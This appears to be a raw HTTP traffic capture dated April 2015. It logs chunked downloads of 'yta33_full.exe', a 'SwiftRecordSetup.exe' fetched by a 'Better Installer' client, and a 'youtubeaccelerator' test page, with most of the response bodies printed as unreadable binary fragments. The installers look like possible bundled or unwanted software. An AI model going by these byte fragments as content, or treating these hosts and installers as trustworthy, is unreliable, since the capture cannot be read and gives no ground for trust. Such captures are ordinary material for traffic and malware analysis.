..f.}g8..;<X...H:v.A..nq.x...h8'.h..D..p3$...0....t(>.A....._.&g
t;..~...H. ...o...3#.C|4.E..0d.......mr&.$.W.z...;`.c.}w..............
....&s...*......^..d.......WK....g..c......E......C....>.....FH/...
$.k.<C....h...........:..`._v7xP.Aq..F.{..Q9Y(>.g....2..bz:.FY..
#G.5...p............~U...#...GAl..Y..q-..P...&.gyy......*.......7...7y
..QJ...].....}.....{..F..G......B[.......Y....Q.z.E^wd....K|x.v...
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2500000-2749999/7590800
O#.g.S.*...UA.]0..wOBY.O_..'...1....<..@......*,..A.._f.]".......{.
x.]v.......-</..R....-@-.....?...2.?...'J&G... ...BL..?..ht.J:.:.=.
( ..8..Z..b3X...7.7.I}.9}F2.5....:$..S|_...=...**.BULN....K..9..<.*
p.:.O.P.....c.U....L..... q......x.......A.....J.e.c..;Ye....G...FP..=
.mQv..a..:..............P.(?  |...2..C..=.........g.ix..P.y..=.....m&.
.....F-Et<~b.xD...M.....5...y.*..o.}T...6..Q....E.q.........F....P\
!.........A.\..8j :nU/...q|0.e%F.|...N<|.,?.^~...V..^..2.N9e. ....Y
....9zU]........y.=`...Q6fUR ...I....t.c;c#..8.......a\.hn[yB.|...D.c.
....4.QFxGa...l.......Q0.q./.....@O.\i..(.8X......w........#U...n.....
..1z..|8....2....S...."..S...|K.w..|.....v.Re.x.%..yV....... .|..._.If
...D..X#Ht......Y:...%.?....:..d.,....I;..........)...'c...,N<....*
..G....M..!..j.............0.^.h[.6..;...=D.T......r6.....).I.&......O
.....@E.`.....L.`.|..,. ....j....\.`[email protected]........,.#.....V
.s...i.....xd...K.7..e.n;sg....IP....\&...............4......!..: ..].
.k ...(!.I...D....t.....`=...a.H.$r.....|[WIis....;3_......J..]...9j..
3.&..=V..T..G.J_.?:.|.k.r.z...W...v.gX..O...I.Q...nAh.........v....('.
.....a....S....o.. bRk..YLG\r3.ogc.....U....Bu.. ig......l.>..|...5
3ZJD>.GN.7..MA3.R...L.:........U.YY.m%.G......R....S.or.c1.%.Z.F...
r...LN......5.w$g&.\.._.....V.h...bbv...bbu)[...~....V.".7...:g.P.....
R2.JqE........./f.I..Kzp$....YF...d..9........F.y...Q....#.(Bf..."....
q.QP`.U..h. #s,`}....C...2.9cJ,....U.CT.#X.......D.o...l.......6n.6.S.
....:....e..a}...32,R..I.....l.....xG.e...6..T...y.Z.....~........
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3500000-3749999/7590800
..N..(.j..X.E.|........#C.W....L.^Z-B.9.!P|.25-U..X.......;,...g.Q..E&
gt;......8...T...|...x.......c..s.....f-.../".W..S..&P}v=....Z1...C...
.;.l.8V...e..5.6.%.Mx.}[email protected].[..Y...$..5!.
....Fe....ze.SE..H....Y.tR.,.2..........Ue..\...Cu..Z.9........... K..
.nD..Z..z...V..5.}.be.t.aZZ.,..C.....3.<.........\.H...T..=..&..:..
.....l.......a...B3>7..g...V.....>.U.M...hN.;AD...)Dm..3..9...J.
........FF./......j2..G.o.G...!wP(.{..T...*$..l.3.,m...;-.1a..aM;X'-.(
...`-.Yw...3.X.i..*\......%Pq.OM1e......s..aM..o]`...6m..`je.$.~.....-
.l.pNx....N..z].4_rZ..\W(.. .....W'.M.... .....Zbph*.nm.~}1..^b....{..
8......#t...... :...\..A.. .1.0..TJ.-...!okP6.!...Zu....]...,}_.......
..|.z.D`. .7.C...b.sUB9..v."........%y...a4.9....9.!..k0*!,...C.......
.Y..S.c........d..g.gU..u>..>*.L.R.#...8 ..=.N....J~/bbM#yI....(
....`}G..6X..az'."..... ....M.lLKIty...&..(...M..'2..6\.........^...^U
N....,@..9.g.....|....*...i..F.Y.Eh...3.N..T...ZL..6i0...#..P{3......Y
K_.H%....0.N/g......s...f...-.1n..I7..0.m.1g... .<.ehZ.b..,3M....nk
.....J..I`......g...w.5...7...../.0./(....v.PLd|..h.F.;..j^P..C..a ...
.1.k.6'{z.|%5.C......[q....."[email protected]...)......?...`u..q
.X8.......1.....G!...M..c...u.[g..&m!.O..v%.E3...M.o..4.U.7....83.....
...e............Fdd.s...r.7^5Oq.....b)U.5...R.3z.D.'tw.Y>...9...%m.
v..~......)T.....qUX....9e..c.e...o\./l1..PWp........W..d.m...b.bq...e
...w....|Kv......h..m.}.@.)..h..f/ ...h}.q.DU.......o.RoE3.I...m...*4.
...z...UL..U0...`]....KYe...Dw..C...,...f.".....u.|..g..)....F. ..
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/7590800
t.#..I..]h.]h....L.....NU....|....0..ug...|.....3...D5.<.1.2N?..hE.
.(|:.~..........Y..|HU>WmN;...,.G.Z..-;.Q....)...b..g) V.f.R...w...
..Ib.....;[email protected]|[email protected] ..>|Q.O....<...F..../.....O..g.. .
.....zz..._...F..Q......Gh?.&...t.D|N.q.b?.\....)I.....a..FF..s.......
...;.'?...a....~.s.Y.)...)..Gx.w..n.Nu.k4Cj....|....-..N..]......_....
 .}.3....&.O.....$....q.8.*.^[email protected] u..u.I....
[K.R.A.).A.hF..Q..z.`d.P*m..Vp.j0 ...aC.!\F....r...%..2F...3...Y...gZl
8.I.N.In.QT.Az......}...K6:0......|.M.G.w....{H.VH..O!...qO..P...:...8
>.Q?../^.........T...3%......~..n...\..|J{..........V...[.p...C..WB
.....X1...2F9-..iNJ;...e.)[email protected]..
...y.D.G.fq..N.tu.F.....m.....6.$p......:.x#..L....~.i?d.Z.Y.|...L-...
..Q...2.......Y@).J.T...Mi.r..Fx.o.R._.t..T.X..jBA@;.!...)..I....y...(
.....r...:|.Qt.'.]....'....it3$K}.Cb-.2z.\..;Yt..G.....#.L.1...h...z*.
1$8.....bj... IG...W.[lH.}..-.....?".2..n..<.....A.z..n5..gBT....l.
....M......._...&..Y..)....B..@].:....P&B.s....V._u....J......-.c.....
. 4.q...]o.p..........>..@|tZ....V.7r.......pUd.L-P.5T%.&.J.S......
.~...<.!......\."..0!......1)vz[...vc.....n..m....u.....utX.z.zX[G.
...>..uby..&G\....;.qb.....".%...Q..a..S....#....Q.k........K..3\..
.........!. [email protected]...[....4]........kG...h..e.._...u.......l.....
....ms.......\`..B..;.b....Y.Q..B.1C..is.....t[.X=.^..LW%R|Lx.p.J.I.pO
[email protected]...|}.]".=..}\.P...m?.]..DY. .....j.rH
.Co%..q|`D2..`9.F..:)L.3&........H...V..=...h/..{p.l..Ii.=.q>..
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4749999/7590800
..n.6.....@I|..k..4.#..]Y...-5!K.m..}V*4...u.h....h.{....C....V.....?U
..,.....uAA.....8._2....v07....vrX.....P.9..t8K#.g.V.,.)..........Q.|-
.FuSO........x.~ZV[......./....e.F..;$!2..W...INB.'.Z..&H..6......._..
xv..D....%W ....b..j....;.8[.|..I.j.n.../........Bl..(....,6B.K....J.,
=....B.#......{. ......0Y....M...[<Jp.._..2C.#....E$B[.W..F.=3.S..V
..dI...........]%.I`=..),....7.........0...Sixq..k...C~|.%.2..:.....H.
8d..*4..x2..G.......LK..,v.=D.b..x..U...a....;...m...T.Gs....1w.......
nP(I.r.J..BlT.n.*.U....yq...q.v.oQy..*W..=.g....,...^%....%"..x.......
....*.W....|9Ps..6.....d~.n...]..=......=...X>.#..hGG..v...pc...,.?
j......Do@eE"T b._A.5.6..Fr~6:!"b.R......m....p[Ux......&w,....1B..N.q
: .....GZ"E.%.K/.9..m*g.Wy.B...4q../m..u.I....[..t:......k.f....Tu..g.
I.\.q.-i....K...... ...............R.'.D.f.'....M.zn.u. \..CI[lx...e.\
...R......}0D\3..C..g/O.DQ.{B.G.0.......)....$l..9..U.au1.....m.F....&
gt;,Z-tW.D..y.Y..|....;.....C.n75.c$..yGv....&.....}'.ne......5u...{:.
....2A..n(...X.....2Q.....t.l........g>.f.}2.D#..H....r.......O....
>2... Kr....U.......*.a............}X|..!..p.C..s...k.u...pi.C.X`..
[!.m.N...N.M.C.Pli......8..n..........I...eA......,.*.m!.L.L.HGT..(.9.
..Zum..*.J...EL9.O.J.....O.c.....=....3.Sb.H...BP..._....bh ...j.....,
.:..QIF<..%..N.T.d..u.:..Y.....=....D.N.../IThm..Q....:.g.m......6.
X...s...{7K..<6,.....{...}.... U.....#...P.....0..&.v....[......1(`
...S.%d...XE..W...~..a..JM,@2..v..............v.tT.............>..e
...Y.}.oMY..........B.L.c.1..Z.Ve|U..>!7....H{..kI....:..S..p..
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5250000-5499999/7590800
;b.AF..#......`6#.d...#....K.t.[..s...._U..j1s6.........B...oW.......i
..2..k.~..w98m.$.:{.._.J........h.S..0HoA.(s...e.zY...d._J...u........
o&...>...A..b.......A\..bK...:...........G.....-p..%c^.I..S..b..S[&
gt;-.........k........}@.{....8......8.2WA...SW..%.S .bG...o.\....<
.5o...<P.....}..pR...6r".G.E..E)E...lL._....~...`O.r...j.m./4.....a
Q......H.27..0..RE..%.......f."`y....Q.<...~f.P....D...6...n...k.M.
=.gx...bQ...O$..a..@r\..;.;[email protected]'hE...x...?T6.w.K.q..-n V>.L.
8C......l...F...Y..{\.;%Z;.Z/.....W?.7..........)*.....l.L:.N..H.....j
^....D.....;.G(.....-......F...cJF:......m '....Q.:}M9...f.l...}....".
.e).M...,.....b...J.....FB...9..HT.#.'.w...R]f.p.......e....u.K...3l.@
...d.'.4.v...E...S..Y...*..........d/...o..7........mc......xr.......[
.k...S.$.;R.W..t9.$...)~...Zf.....O$...C.u.A.7...:.....:./c.9........:
Ie.{j.L.R......Q."4q.mnDQ.f..M7........m_.keE.}../...v.....n .g..2..Pp
..._..|.2..i............v.U..{..J....4..8N.e...]#.$..M..../.t.....4.].
|f....ybsx......)........>)d..`..8..JcAlxE.....j.0Y....."W.JL...~..
.5@...?o.Q&e.<M.......W....../h.n.....e...........Q.ny_6.w....K...]
...Y.'..Hr.{..K..l]...4.......x.M...........5.L.7Y...4..!-.~lI.jR....^
QX..n6nlJ.4...=./.W.w:.v..5....K...Je5 ..'..7 ).Z.W.Ya.......}G..q.'.`
.j@<.....J...Vd...x....Y.[.jw....:....Z.....;tOSp].G..zGn....H...nb
....Mj8.u:Q.ys.'.Qu..V........{k...(.J.D...0%....j.........#^K........
.F!.L.Bh.........w.dkD:..5..;.@....*..F.Qc.0..^<Ft.W..F;......P..C.
.bK7']8[2.l*..1..M...k.....Q..uB\N.uG?x..H.....n..m.N.........8.H.
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6000000-6249999/7590800
..!.....<..(..).n........Nvh][.....f.M.}...*./Z..A?.........po..M..
.&9=..Iq..N.tr...%e.|.E..U.....g...I.><..@......[....&...) .S...
.....<.d.0.@..~L..N...6.b. le.p....8...a2.........rvM..O...?.....#A
.<S.1_.._..Ww../......F...m3 I..Aa.z...d....).i.2...e.....-J.?..b..
.(..........H-..6.._....1.c.>...R....gv.........e..=......Xj.U.CZ;.
.[.u.. ..3SS1DN9._x.uz.4..C87.....r..F[.;Wy.p...f................kr..(
....Z..$..B.....vm[1.x..I.dWX.r....`...........-5.^.82.m.>(bpYd1.ID
...0......s..l. ^^^R.8....p....;.=.4F..}.&....`...g.io.=....`..Fp...M.
...;..v:E-.#.....g......w.7`4...NCYH....M..|.du].Js...&U(..\./.F..Ic..
..".c.xN...B..o.KK..e....{..G..n...i@(..t6v...`V.;=.-W.1p...O.z.......
*.:.....#o%.;D~...`.......9q.....Y}&."...X.t.aZYL.W..!f..}R.5d=.\M`..7
.K...mQ../...Q.$.\/..?.B.....Fj.... ....(.[2.k.{......t.....S...u..W.O
....yk;......gf.w..|...e>..........ucC9....#......*.'....5.....EFbY
.5..9.B:s<.......3.68.~M......V....4.j<...........A..O./|...._..
.*.). ..Z....O...6....9.....<.d{....._953.....J..E....>.F E.f.b.
<.:<$..n..,!.."....L.......,..^O..z.,fF.%?...h.]MP..:.k5..A...\.
.=e.L0..zb.... j.F.]@M..W`B1[p...B~<._....hW...6b...\...W.4?.|j\h_.
~.R..@...:........C<.5...*..<*A/V&.|...'.$./..mD.p..]p..P...R.X#
.vYbk.\..l>...*..i.....t..1..<.h.............._. .L.^...n...T...
........~5..uD.Z...q....~..}.\#....Ql...'.8.K4..}..N....A..yX...2P....
or<.... .._,...[.p........\..r...Z:..W..i.....G....C....{....p..].5
9...x...J.....a.u... ......T.:.!.....!.....Z<...4..S...k......K
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=6500000-6749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6500000-6749999/7590800
.....M...7-=b``..F_..XX..G..9.RN...y.5.{..t.h..SU.W..<.".._.......Z
.].F.}..8...`zW.......&~.Q.&'.=]V....iq..xBjx......{..W....d...\.;....
.E....e.9$... ....T.e...Z,..Q9......]RV6Y1..=`.3..n......H......(...qr
...8..*......<.S.|g..]...(B..n..JO]v.q.l9.R!...{;.......1.~2.K..c..
....6A/."..voE...{.&...g..b....Du......_p6d..i..7..."0~...N......V..LQ
....Z.K..>...X.....3,[email protected].,...-
y..yt"...-....t..da.}....|....o`Y&{.?._.'..y.\..dt;n....c...qJZ6.S....
....".....R.J6.T......ME.o.NFX.....c..........j.?P.*X.....E..im.r#....
....1 ..c....a@. ..Up...$.:.......28.r.o.........8..'....|.......^....
]......./.A...r"..h.....#;...G.u..o...l...w.A.......P.^t.I....7.....2)
8.f..L6..}.OH.L.M&j.[.(3.'.K....%..x=.GE.;.<[email protected]^..
....T..-.......3..Z....l..w......[.....e..,......s4.....Q...i.u)....._
...... <..Y.B.Q......s....:.....K.{wv...Vk.C.qXc..8....b..]...[...Z
nJC .q.[.......@....>>..k./T...9K..eX....5\b..<b...K......N..
...R......S.F....6..h.etQ.[....f...1..8N.cM..4...........6..0.v.......
..Q....vnJ....2...(vh..o].'..h..db...|.`G.>....Z.......1."u.....*..
w;.C.L.^3.h.....m..V}.L.4.q.w.......4Z{%(-..O@&j......8`......C.J..hv.
.....|.F-......*'x.`.]!y..(...I.iv.Vv.I.v.....4.)[...<.J....aI_N...
~0)R....1l{.... .>.k..hEG-?..qO..K.X....f)....h......0q.?]..9.B.U..
......K...n..3.q...Q..Q...x9...L..v.< ..3..Nh3...R*.%T3.."...-..GrM
U..6.?..B.Nw{lo...f'.(Rh)k........w)^.)..dt..=.Q.T.[.l.2.E.....h..Z...
'.....].K;|k....8v.'...l..D.\fu....{~O..W..$|...x......JW=q.l.B/.'
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=7250000-7499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7250000-7499999/7590800
1if....t......... ...9..... .&K..#.......... aW.R...r.y.K..M.D...W.R..
$..l...:e..W.;..(.... .%..:.....:...T.0...]...C.Sg..UH.'p.85H.........
..l......#f.0XY.$....a...p....&.6..h..P....|d......e..'......J......q.
..<j..8sG......._R..Zg.@.,."9....@.)W....N0....6.7w%..`...s%..P{..d
w.!]d...u3<X/.......?D.......161?3..|..%...i...O.qR....Uc=......f.m
[email protected](....J..RD...k.6...O.VG.A..z^.N`[email protected] %..
A...L<.d.....tZ.3..yc..^.[...Hv.&.<9..}..D.J..Y..&G.....gs...Ek.
g|ow.z'W..!.m..$..r;~..LU.D1D5.j.,~..B.B#2...u!^...\....8...CW.h....g.
'!...,....q..G.......3...qTL.........V*O....L..|.~.........N.e-..)v..A
.........7...I.AqOz..i.3.Q.W...s.).....B..S{..~..........p..{.. z.._'c
.EB....]...0R.P..U...*|.....~.{.oa&.(.h6."8..j.T...A6..] OM........df.
Hklt3..io.-...|. ...*[email protected]...@/..<. ...o.......
..i...........5b>....#/=2P>F....C].yB.pc.S.I-..{.,.......'$.."..
.......x..D......5....x.M6^[email protected]..:..V.d@&...0.....{.#.K..
.{.....q&..k..S.6.....bc.....xq.R.P........W.^[email protected][.,.......m..\..
\...5.._...I...0....).K.C..U>U.#.................D...7;...W..H.(.a.
.>..Ps......1....r..[Nl..}......>r^..0O..&..%..FS....I..).E.Q...
").DL..K.8...#.."IV.R..V..Y....i.}......"..H1.../....nE0y.A......AJ.=L
........l.......sb.../ ....n...r1-`....^H-..n...z..C.p..J.1.........-1
.6...5.VO..[.>.-....?....%.|..j..8...4.A.U.........pP.9.z..f...cgb.
:......X..(ck.......X......P..5..............`...E.....d.K.K.z.i..eN..
.vy.....;..`f..B...V2H....R...N.....L8.,.}...0.}S..?Z.Y.....^..?.1
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=7500000-7590799
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 90800
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7500000-7590799/7590800
~...8O.'..!...t..xO.5//o...v....oK.Q.$.Dg......(G2t..`0(.BQ|..U.......
.....x..in...H.sKv..M..a.s...b.?.3...C..d...v..0.tdo.I..{...~.z;..v...
>.9j.#.....W.t_|$......Na8..7.i..o.....-|...;.MPg.i.).A....=..X.".C
......K...Vk.u...M.a.v.6q.q.*..x<j.j.~?....A.3.h...Rb.s..[..E......
.....'Q.8"...P.KC.#.j....{<......)P...:Ka[VVc'.ao.......U...E....QM
(......At-........{|.H..FI..X.....,..8..cj....S.!/.0S.B..d...A.....C..
p8...|a..j.?...eZ..L...S.i... .N...v..Lb..**\U....Z.....|.`8...^t.^-J"
..:...:....#.G...{...}L.K..&.=j...%.e.Lq=$.Q..~M..CA.vy8.............i
EGkVccN....NZg\1n.}k.x.E......h..hM.Q.P..D....r.D.A....a.>\Y,[s.[2.
.8/.-.T.c..v|..E.F......f.]...X....%....G.....|8.#>.$...<..'....
.....%  ....x....G..Q..u.F.<vl..].(5v....-).(.Qzn.rT..*.<.....#.
......I.....l.j.j..K9.ThZr.....`dm..'1F*.b$R.G5......G.|....L0....D"./
..=.?~..;..."j6.ub.e....8.Tx...V......x...<..........$..m..5..H%1".
1H.8..;.......ef..8Y..........i.'..7y......u....).c{IQ.............l.z
p(F.I..q.lq:%.....K.....Ob.......Kk.^....<..K.vu..Y;...QM1:.......M
.1;.....4..t...~Y...Qf..t.-. N/.^..s,.8r..k..i.h.D...=I."R-.>......
.......w..p..aWgR.-...5y.3..xF....]2f........)<4-. .$2..L.E.......B
2^.8-......UY.55..[7.j}q...#k....N..v.).b2J....}psF....bvw~.!...../& X
.-.S...I.2 .......Qw-.u......0.....I.X.4...eQO..........v...i....#<
..?...j...P][email protected]~q.mw`O.lQ...).1*.P.(:}P}-..."....C
.e~7.)..N.j..6..3S.s,.j...S<...mw.]..._|..5S.....BD.%....8i....Q._.
...3.4?.S.9......@N...*..YMMz..M..G.Zul.-o.=c...l..E..z...K.....;&
<<< skipped >>>


GET /sd?is=sm HTTP/1.1
Range: bytes=327045-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 327045-523271/523272
Content-Length: 196227
Connection: keep-alive
6.C.......4..e.(.....7.dQ.I......l....J..:.W<.m7Fd/.!.I.s.....z...Q
.(O.....h.........V...E....T..K....K...".}..O%.K...D..Me.."..b....9.D.
.Q..L?..`......`..!|X.=....vt5..2w...%.q.$R....).. ..t..f...&......V.6
......V...J...}l..),"[C...ro U..g$4...?JO/#.p...[T..}l....m......R....
.B.-c..........D..../....$..r3..........!!.o..#'[email protected]......
.....)n:S.`....ZP.:Ih.!.\..Za[P....u.@.'.....0.8..^.6.............R...
J...T.e.a:._y.".$y......x......9.N..aL[..2..Z$....[.y,u...0^..a..pJ..P
[email protected]..^%2i..rJF..C..0c...}..&....z`.2h"'.;.L.
n.....j4........b..47.....B...8....\.}Ta`.<........K....<..."..j
.oj}.}..<aQ.........iIy..'.6E...........EI.@....>......m........
.|.}[email protected]@"....G4...C..A...o.6...97..H...%.[g.
.."[email protected].~P....*[email protected]....`......m/.........yY.&g
t;.....=...VEd.-.........q.V0..,.i.H:...X...73....Q..E.%.......h..q.bH
O!.c...H...|..<....}....%....9..>M.......fd..>..\....._4eh...
./.C [email protected].........=.p...........L....
}..Id....x..Gq.M.^.w.I'..a.\Ca.v.7#..vP..^..m..&..X.k.L.L.....r.......
...S|.r....l=.YYr..`9..........e.y!..p...o........p[......-..S........
..J...x....g~........F....E....W.....D0....-p].Wx...'...d0m;9..a......
k.........c1.;...........`w.k.{O......P..E``.<b.......c[}.}.....Iy.
..j?,.s....}T>...*.V.|...L9........M..68..v]...M.H......ycr......'.
U....a...K....Z.J~..GCB&..7F.1.l.! .&.m.O)@y...x%.%..c>.#.....>.
(KCN...m.y....J...;.s.G..i.U...}...~..z^P......B....H.>.5......
<<< skipped >>>


GET /video_accelerator/wizardtest/SMALLTEST.HTM?random=580526&mode=nolsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: test.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 21 Jul 2008 09:41:32 GMT
Accept-Ranges: bytes
ETag: "bfefaff515ebc81:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:51 GMT
Content-Length: 167
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".......~....O......7.O.........
....'_>.}. ..>..o.?...MF...HTTP/1.1 200 OK..Content-Type: text/h
tml..Content-Encoding: gzip..Last-Modified: Mon, 21 Jul 2008 09:41:32 
GMT..Accept-Ranges: bytes..ETag: "bfefaff515ebc81:0"..Vary: Accept-Enc
oding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Sat, 18
 Apr 2015 23:35:51 GMT..Content-Length: 167...............`.I.%&/m.{.J
.J..t...`[email protected]#).*..eVe]f.@......{....{....;.N'...?\fd.l..J
...!....?~|.?".......~....O......7.O.............'_>.}. ..>..o.?
...MF.....



GET /sd?is=sm HTTP/1.1
Range: bytes=130818-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 130818-523271/523272
Content-Length: 392454
Connection: keep-alive
.Y#./[email protected]}R...;B...,..vgQ4...W..O&..
